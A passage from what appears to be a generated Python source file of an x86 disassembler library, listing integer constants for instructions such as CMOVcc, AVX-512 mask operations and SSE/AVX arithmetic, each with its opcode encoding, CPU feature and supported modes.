``CMOVGE r64, r/m64``
``o64 0F 4D /r``
``CMOV``
``64-bit``
"""
CMOVLE_R16_RM16: int = 1211
"""
``CMOVLE r16, r/m16``
``o16 0F 4E /r``
``CMOV``
``16/32/64-bit``
"""
CMOVLE_R32_RM32: int = 1212
"""
``CMOVLE r32, r/m32``
``o32 0F 4E /r``
``CMOV``
``16/32/64-bit``
"""
CMOVLE_R64_RM64: int = 1213
"""
``CMOVLE r64, r/m64``
``o64 0F 4E /r``
``CMOV``
``64-bit``
"""
CMOVG_R16_RM16: int = 1214
"""
``CMOVG r16, r/m16``
``o16 0F 4F /r``
``CMOV``
``16/32/64-bit``
"""
CMOVG_R32_RM32: int = 1215
"""
``CMOVG r32, r/m32``
``o32 0F 4F /r``
``CMOV``
``16/32/64-bit``
"""
CMOVG_R64_RM64: int = 1216
"""
``CMOVG r64, r/m64``
``o64 0F 4F /r``
``CMOV``
``64-bit``
"""
VEX_KANDW_KR_KR_KR: int = 1217
"""
``KANDW k1, k2, k3``
``VEX.L1.0F.W0 41 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KANDQ_KR_KR_KR: int = 1218
"""
``KANDQ k1, k2, k3``
``VEX.L1.0F.W1 41 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KANDB_KR_KR_KR: int = 1219
"""
``KANDB k1, k2, k3``
``VEX.L1.66.0F.W0 41 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KANDD_KR_KR_KR: int = 1220
"""
``KANDD k1, k2, k3``
``VEX.L1.66.0F.W1 41 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KANDNW_KR_KR_KR: int = 1221
"""
``KANDNW k1, k2, k3``
``VEX.L1.0F.W0 42 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KANDNQ_KR_KR_KR: int = 1222
"""
``KANDNQ k1, k2, k3``
``VEX.L1.0F.W1 42 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KANDNB_KR_KR_KR: int = 1223
"""
``KANDNB k1, k2, k3``
``VEX.L1.66.0F.W0 42 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KANDND_KR_KR_KR: int = 1224
"""
``KANDND k1, k2, k3``
``VEX.L1.66.0F.W1 42 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KNOTW_KR_KR: int = 1225
"""
``KNOTW k1, k2``
``VEX.L0.0F.W0 44 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KNOTQ_KR_KR: int = 1226
"""
``KNOTQ k1, k2``
``VEX.L0.0F.W1 44 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KNOTB_KR_KR: int = 1227
"""
``KNOTB k1, k2``
``VEX.L0.66.0F.W0 44 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KNOTD_KR_KR: int = 1228
"""
``KNOTD k1, k2``
``VEX.L0.66.0F.W1 44 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KORW_KR_KR_KR: int = 1229
"""
``KORW k1, k2, k3``
``VEX.L1.0F.W0 45 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KORQ_KR_KR_KR: int = 1230
"""
``KORQ k1, k2, k3``
``VEX.L1.0F.W1 45 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KORB_KR_KR_KR: int = 1231
"""
``KORB k1, k2, k3``
``VEX.L1.66.0F.W0 45 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KORD_KR_KR_KR: int = 1232
"""
``KORD k1, k2, k3``
``VEX.L1.66.0F.W1 45 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXNORW_KR_KR_KR: int = 1233
"""
``KXNORW k1, k2, k3``
``VEX.L1.0F.W0 46 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KXNORQ_KR_KR_KR: int = 1234
"""
``KXNORQ k1, k2, k3``
``VEX.L1.0F.W1 46 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXNORB_KR_KR_KR: int = 1235
"""
``KXNORB k1, k2, k3``
``VEX.L1.66.0F.W0 46 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KXNORD_KR_KR_KR: int = 1236
"""
``KXNORD k1, k2, k3``
``VEX.L1.66.0F.W1 46 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXORW_KR_KR_KR: int = 1237
"""
``KXORW k1, k2, k3``
``VEX.L1.0F.W0 47 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KXORQ_KR_KR_KR: int = 1238
"""
``KXORQ k1, k2, k3``
``VEX.L1.0F.W1 47 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXORB_KR_KR_KR: int = 1239
"""
``KXORB k1, k2, k3``
``VEX.L1.66.0F.W0 47 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KXORD_KR_KR_KR: int = 1240
"""
``KXORD k1, k2, k3``
``VEX.L1.66.0F.W1 47 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KADDW_KR_KR_KR: int = 1241
"""
``KADDW k1, k2, k3``
``VEX.L1.0F.W0 4A /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KADDQ_KR_KR_KR: int = 1242
"""
``KADDQ k1, k2, k3``
``VEX.L1.0F.W1 4A /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KADDB_KR_KR_KR: int = 1243
"""
``KADDB k1, k2, k3``
``VEX.L1.66.0F.W0 4A /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KADDD_KR_KR_KR: int = 1244
"""
``KADDD k1, k2, k3``
``VEX.L1.66.0F.W1 4A /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KUNPCKWD_KR_KR_KR: int = 1245
"""
``KUNPCKWD k1, k2, k3``
``VEX.L1.0F.W0 4B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KUNPCKDQ_KR_KR_KR: int = 1246
"""
``KUNPCKDQ k1, k2, k3``
``VEX.L1.0F.W1 4B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KUNPCKBW_KR_KR_KR: int = 1247
"""
``KUNPCKBW k1, k2, k3``
``VEX.L1.66.0F.W0 4B /r``
``AVX512F``
``16/32/64-bit``
"""
MOVMSKPS_R32_XMM: int = 1248
"""
``MOVMSKPS r32, xmm``
``NP 0F 50 /r``
``SSE``
``16/32/64-bit``
"""
MOVMSKPS_R64_XMM: int = 1249
"""
``MOVMSKPS r64, xmm``
``NP o64 0F 50 /r``
``SSE``
``64-bit``
"""
VEX_VMOVMSKPS_R32_XMM: int = 1250
"""
``VMOVMSKPS r32, xmm2``
``VEX.128.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPS_R64_XMM: int = 1251
"""
``VMOVMSKPS r64, xmm2``
``VEX.128.0F.W1 50 /r``
``AVX``
``64-bit``
"""
VEX_VMOVMSKPS_R32_YMM: int = 1252
"""
``VMOVMSKPS r32, ymm2``
``VEX.256.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPS_R64_YMM: int = 1253
"""
``VMOVMSKPS r64, ymm2``
``VEX.256.0F.W1 50 /r``
``AVX``
``64-bit``
"""
MOVMSKPD_R32_XMM: int = 1254
"""
``MOVMSKPD r32, xmm``
``66 0F 50 /r``
``SSE2``
``16/32/64-bit``
"""
MOVMSKPD_R64_XMM: int = 1255
"""
``MOVMSKPD r64, xmm``
``66 o64 0F 50 /r``
``SSE2``
``64-bit``
"""
VEX_VMOVMSKPD_R32_XMM: int = 1256
"""
``VMOVMSKPD r32, xmm2``
``VEX.128.66.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPD_R64_XMM: int = 1257
"""
``VMOVMSKPD r64, xmm2``
``VEX.128.66.0F.W1 50 /r``
``AVX``
``64-bit``
"""
VEX_VMOVMSKPD_R32_YMM: int = 1258
"""
``VMOVMSKPD r32, ymm2``
``VEX.256.66.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPD_R64_YMM: int = 1259
"""
``VMOVMSKPD r64, ymm2``
``VEX.256.66.0F.W1 50 /r``
``AVX``
``64-bit``
"""
SQRTPS_XMM_XMMM128: int = 1260
"""
``SQRTPS xmm1, xmm2/m128``
``NP 0F 51 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSQRTPS_XMM_XMMM128: int = 1261
"""
``VSQRTPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSQRTPS_YMM_YMMM256: int = 1262
"""
``VSQRTPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTPS_XMM_K1Z_XMMM128B32: int = 1263
"""
``VSQRTPS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPS_YMM_K1Z_YMMM256B32: int = 1264
"""
``VSQRTPS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPS_ZMM_K1Z_ZMMM512B32_ER: int = 1265
"""
``VSQRTPS zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.0F.W0 51 /r``
``AVX512F``
``16/32/64-bit``
"""
SQRTPD_XMM_XMMM128: int = 1266
"""
``SQRTPD xmm1, xmm2/m128``
``66 0F 51 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSQRTPD_XMM_XMMM128: int = 1267
"""
``VSQRTPD xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSQRTPD_YMM_YMMM256: int = 1268
"""
``VSQRTPD ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTPD_XMM_K1Z_XMMM128B64: int = 1269
"""
``VSQRTPD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPD_YMM_K1Z_YMMM256B64: int = 1270
"""
``VSQRTPD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPD_ZMM_K1Z_ZMMM512B64_ER: int = 1271
"""
``VSQRTPD zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 51 /r``
``AVX512F``
``16/32/64-bit``
"""
SQRTSS_XMM_XMMM32: int = 1272
"""
``SQRTSS xmm1, xmm2/m32``
``F3 0F 51 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSQRTSS_XMM_XMM_XMMM32: int = 1273
"""
``VSQRTSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTSS_XMM_K1Z_XMM_XMMM32_ER: int = 1274
"""
``VSQRTSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 51 /r``
``AVX512F``
``16/32/64-bit``
"""
SQRTSD_XMM_XMMM64: int = 1275
"""
``SQRTSD xmm1, xmm2/m64``
``F2 0F 51 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSQRTSD_XMM_XMM_XMMM64: int = 1276
"""
``VSQRTSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTSD_XMM_K1Z_XMM_XMMM64_ER: int = 1277
"""
``VSQRTSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 51 /r``
``AVX512F``
``16/32/64-bit``
"""
RSQRTPS_XMM_XMMM128: int = 1278
"""
``RSQRTPS xmm1, xmm2/m128``
``NP 0F 52 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRSQRTPS_XMM_XMMM128: int = 1279
"""
``VRSQRTPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 52 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VRSQRTPS_YMM_YMMM256: int = 1280
"""
``VRSQRTPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 52 /r``
``AVX``
``16/32/64-bit``
"""
RSQRTSS_XMM_XMMM32: int = 1281
"""
``RSQRTSS xmm1, xmm2/m32``
``F3 0F 52 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRSQRTSS_XMM_XMM_XMMM32: int = 1282
"""
``VRSQRTSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 52 /r``
``AVX``
``16/32/64-bit``
"""
RCPPS_XMM_XMMM128: int = 1283
"""
``RCPPS xmm1, xmm2/m128``
``NP 0F 53 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRCPPS_XMM_XMMM128: int = 1284
"""
``VRCPPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 53 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VRCPPS_YMM_YMMM256: int = 1285
"""
``VRCPPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 53 /r``
``AVX``
``16/32/64-bit``
"""
RCPSS_XMM_XMMM32: int = 1286
"""
``RCPSS xmm1, xmm2/m32``
``F3 0F 53 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRCPSS_XMM_XMM_XMMM32: int = 1287
"""
``VRCPSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 53 /r``
``AVX``
``16/32/64-bit``
"""
ANDPS_XMM_XMMM128: int = 1288
"""
``ANDPS xmm1, xmm2/m128``
``NP 0F 54 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VANDPS_XMM_XMM_XMMM128: int = 1289
"""
``VANDPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDPS_YMM_YMM_YMMM256: int = 1290
"""
``VANDPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDPS_XMM_K1Z_XMM_XMMM128B32: int = 1291
"""
``VANDPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPS_YMM_K1Z_YMM_YMMM256B32: int = 1292
"""
``VANDPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1293
"""
``VANDPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 54 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ANDPD_XMM_XMMM128: int = 1294
"""
``ANDPD xmm1, xmm2/m128``
``66 0F 54 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VANDPD_XMM_XMM_XMMM128: int = 1295
"""
``VANDPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDPD_YMM_YMM_YMMM256: int = 1296
"""
``VANDPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDPD_XMM_K1Z_XMM_XMMM128B64: int = 1297
"""
``VANDPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPD_YMM_K1Z_YMM_YMMM256B64: int = 1298
"""
``VANDPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1299
"""
``VANDPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 54 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ANDNPS_XMM_XMMM128: int = 1300
"""
``ANDNPS xmm1, xmm2/m128``
``NP 0F 55 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VANDNPS_XMM_XMM_XMMM128: int = 1301
"""
``VANDNPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDNPS_YMM_YMM_YMMM256: int = 1302
"""
``VANDNPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDNPS_XMM_K1Z_XMM_XMMM128B32: int = 1303
"""
``VANDNPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPS_YMM_K1Z_YMM_YMMM256B32: int = 1304
"""
``VANDNPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1305
"""
``VANDNPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 55 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ANDNPD_XMM_XMMM128: int = 1306
"""
``ANDNPD xmm1, xmm2/m128``
``66 0F 55 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VANDNPD_XMM_XMM_XMMM128: int = 1307
"""
``VANDNPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDNPD_YMM_YMM_YMMM256: int = 1308
"""
``VANDNPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDNPD_XMM_K1Z_XMM_XMMM128B64: int = 1309
"""
``VANDNPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPD_YMM_K1Z_YMM_YMMM256B64: int = 1310
"""
``VANDNPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1311
"""
``VANDNPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 55 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ORPS_XMM_XMMM128: int = 1312
"""
``ORPS xmm1, xmm2/m128``
``NP 0F 56 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VORPS_XMM_XMM_XMMM128: int = 1313
"""
``VORPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VORPS_YMM_YMM_YMMM256: int = 1314
"""
``VORPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VORPS_XMM_K1Z_XMM_XMMM128B32: int = 1315
"""
``VORPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPS_YMM_K1Z_YMM_YMMM256B32: int = 1316
"""
``VORPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1317
"""
``VORPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 56 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ORPD_XMM_XMMM128: int = 1318
"""
``ORPD xmm1, xmm2/m128``
``66 0F 56 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VORPD_XMM_XMM_XMMM128: int = 1319
"""
``VORPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VORPD_YMM_YMM_YMMM256: int = 1320
"""
``VORPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VORPD_XMM_K1Z_XMM_XMMM128B64: int = 1321
"""
``VORPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPD_YMM_K1Z_YMM_YMMM256B64: int = 1322
"""
``VORPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1323
"""
``VORPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 56 /r``
``AVX512DQ``
``16/32/64-bit``
"""
XORPS_XMM_XMMM128: int = 1324
"""
``XORPS xmm1, xmm2/m128``
``NP 0F 57 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VXORPS_XMM_XMM_XMMM128: int = 1325
"""
``VXORPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VXORPS_YMM_YMM_YMMM256: int = 1326
"""
``VXORPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VXORPS_XMM_K1Z_XMM_XMMM128B32: int = 1327
"""
``VXORPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPS_YMM_K1Z_YMM_YMMM256B32: int = 1328
"""
``VXORPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1329
"""
``VXORPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 57 /r``
``AVX512DQ``
``16/32/64-bit``
"""
XORPD_XMM_XMMM128: int = 1330
"""
``XORPD xmm1, xmm2/m128``
``66 0F 57 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VXORPD_XMM_XMM_XMMM128: int = 1331
"""
``VXORPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VXORPD_YMM_YMM_YMMM256: int = 1332
"""
``VXORPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 57 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VXORPD_XMM_K1Z_XMM_XMMM128B64: int = 1333
"""
``VXORPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPD_YMM_K1Z_YMM_YMMM256B64: int = 1334
"""
``VXORPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 57 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VXORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1335
"""
``VXORPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 57 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ADDPS_XMM_XMMM128: int = 1336
"""
``ADDPS xmm1, xmm2/m128``
``NP 0F 58 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VADDPS_XMM_XMM_XMMM128: int = 1337
"""
``VADDPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDPS_YMM_YMM_YMMM256: int = 1338
"""
``VADDPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDPS_XMM_K1Z_XMM_XMMM128B32: int = 1339
"""
``VADDPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPS_YMM_K1Z_YMM_YMMM256B32: int = 1340
"""
``VADDPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1341
"""
``VADDPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 58 /r``
``AVX512F``
``16/32/64-bit``
"""
ADDPD_XMM_XMMM128: int = 1342
"""
``ADDPD xmm1, xmm2/m128``
``66 0F 58 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VADDPD_XMM_XMM_XMMM128: int = 1343
"""
``VADDPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDPD_YMM_YMM_YMMM256: int = 1344
"""
``VADDPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDPD_XMM_K1Z_XMM_XMMM128B64: int = 1345
"""
``VADDPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPD_YMM_K1Z_YMM_YMMM256B64: int = 1346
"""
``VADDPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 58 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VADDPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1347
"""
``VADDPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 58 /r``
``AVX512F``
``16/32/64-bit``
"""
ADDSS_XMM_XMMM32: int = 1348
"""
``ADDSS xmm1, xmm2/m32``
``F3 0F 58 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VADDSS_XMM_XMM_XMMM32: int = 1349
"""
``VADDSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDSS_XMM_K1Z_XMM_XMMM32_ER: int = 1350
"""
``VADDSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 58 /r``
``AVX512F``
``16/32/64-bit``
"""
ADDSD_XMM_XMMM64: int = 1351
"""
``ADDSD xmm1, xmm2/m64``
``F2 0F 58 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VADDSD_XMM_XMM_XMMM64: int = 1352
"""
``VADDSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 58 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VADDSD_XMM_K1Z_XMM_XMMM64_ER: int = 1353
"""
``VADDSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 58 /r``
``AVX512F``
``16/32/64-bit``
"""
MULPS_XMM_XMMM128: int = 1354
"""
``MULPS xmm1, xmm2/m128``
``NP 0F 59 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMULPS_XMM_XMM_XMMM128: int = 1355
"""
``VMULPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMULPS_YMM_YMM_YMMM256: int = 1356
"""
``VMULPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULPS_XMM_K1Z_XMM_XMMM128B32: int = 1357
"""
``VMULPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPS_YMM_K1Z_YMM_YMMM256B32: int = 1358
"""
``VMULPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1359
"""
``VMULPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 59 /r``
``AVX512F``
``16/32/64-bit``
"""
MULPD_XMM_XMMM128: int = 1360
"""
``MULPD xmm1, xmm2/m128``
``66 0F 59 /r``
``SSE2``
